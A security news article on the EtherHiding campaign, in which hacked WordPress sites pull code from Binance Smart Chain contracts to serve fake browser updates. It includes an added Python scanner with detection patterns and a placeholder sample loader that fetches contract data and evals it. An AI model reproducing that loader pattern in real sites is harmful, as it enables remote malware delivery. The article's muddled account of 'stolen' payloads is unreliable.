Guardio Labs' security researchers have shed light on a recent and concerning cybersecurity threat known as "EtherHiding" in a report released on 15 October.
EtherHiding
This technique has emerged as a sophisticated means employed by hackers to infiltrate websites powered by the WordPress platform.
Once inside, they embed malicious code designed to pilfer partial payloads from blockchain contracts.
The stolen payload is subsequently deployed within Binance Smart Chain (BSC) smart contracts, which effectively serve as concealed and anonymous hosting platforms for the nefarious code.
Source: Guardio Labs – the attack flow (from querying the blockchain to total site defacing and malware download)
What sets EtherHiding apart is its adaptability.
Hackers wield the ability to modify the code and alter their attack methods at will.
In a recent evolution of their tactics, they have resorted to fake browser updates as a delivery mechanism.
Unsuspecting victims are lured into updating their web browsers via counterfeit landing pages and links.
Concealed within these payloads lies JavaScript code that retrieves additional instructions from domains under the control of the attackers.
This cunning scheme culminates in the complete defacement of websites, with counterfeit browser update notifications serving as vehicles for the distribution of malware.
The "flexibility" inherent in EtherHiding poses a significant challenge to mitigation efforts, as black hat operators can modify the attack chain with each new blockchain transaction.
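Because the attack chain can change with every blockchain transaction, defenders cannot rely on static payload signatures; what stays constant is the loader's shape: injected JavaScript that queries a contract over JSON-RPC and executes whatever comes back. The following is an added example (not code from Guardio Labs or from the report) of a heuristic scan for that shape in a WordPress page; the RPC and sink patterns are the author's assumptions, and the sample page is constructed.

```python
"""Heuristic scan of a WordPress page for EtherHiding-style loaders.
Flags inline <script> blocks that both query a blockchain JSON-RPC
endpoint and feed the result into a dynamic code-execution sink."""
import re
from html.parser import HTMLParser

# Assumed indicators, not IoCs from the report.
RPC_HINTS = [r"eth_call", r"\"jsonrpc\"", r"\bweb3\b"]
SINK_HINTS = [r"\beval\s*\(", r"new\s+Function\s*\(",
              r"document\.write\s*\(", r"\.innerHTML\s*="]


class _ScriptCollector(HTMLParser):
    """Collects the text of every inline <script> element."""
    def __init__(self):
        super().__init__()
        self._in_script, self.scripts = False, []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._in_script = True
            self.scripts.append("")

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.scripts[-1] += data


def _hits(patterns, text):
    return [p for p in patterns if re.search(p, text)]


def scan_html(html):
    """Return one finding per inline script that shows an RPC hint AND a sink."""
    collector = _ScriptCollector()
    collector.feed(html)
    findings = []
    for index, body in enumerate(collector.scripts):
        rpc, sinks = _hits(RPC_HINTS, body), _hits(SINK_HINTS, body)
        if rpc and sinks:
            findings.append({"script": index, "rpc": rpc, "sinks": sinks})
    return findings


# Constructed sample: a benign analytics snippet, then a loader that reads a
# contract via eth_call and evaluates the decoded result. Placeholders only.
SAMPLE_PAGE = """<html><body>
<script>window.dataLayer = []; dataLayer.push({event: 'pageview'});</script>
<script>
fetch(RPC_URL, {method: 'POST', body: JSON.stringify({"jsonrpc": "2.0",
  "method": "eth_call", "params": [{to: CONTRACT, data: '0x...'}, 'latest'], "id": 1})})
  .then(r => r.json()).then(j => eval(decode(j.result)));
</script>
</body></html>"""
```

Run `scan_html` over the rendered HTML of each page (or over theme and plugin files) and treat any finding as a candidate for manual review; a script that only does one of the two things is not flagged.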
Guardio Labs Security Researchers Speak Up
Nati Tal, Head of Cybersecurity at Guardio Labs, along with fellow security researcher Oleg Zaytsev, underscored the vulnerability of WordPress sites, which are frequently compromised.
They serve as a "primary gateway" for threats of this nature due to WordPress powering approximately 43% of all websites.
Both elaborated:
"WordPress sites are so vulnerable and frequently compromised, as they serve as primary gateways for these threats to reach a vast pool of victims. While their initial method of hosting code on abused Cloudflare Worker hosts was taken down, they've quickly pivoted to take advantage of the decentralised, anonymous, and public nature of blockchain."
Once these compromised smart contracts are deployed, they operate autonomously, leaving Binance with limited recourse, relying on its developer community to identify and report malicious code within contracts as it becomes evident.
Guardio emphasised the necessity for website owners using WordPress, given its widespread usage, to be especially vigilant with their security practices.
It also pointed out that the advent of Web3 and blockchain technology introduces new avenues for unchecked malicious campaigns, calling for adaptive defence mechanisms to counter these emerging threats.
As plugins increasingly represent a substantial attack vector within the WordPress ecosystem, it is essential for users who depend on this content management system (CMS) to embrace security best practices.
This entails maintaining vigilant system hygiene by promptly applying the latest patches and updates, judiciously removing redundant administrative users, and implementing stringent password protocols.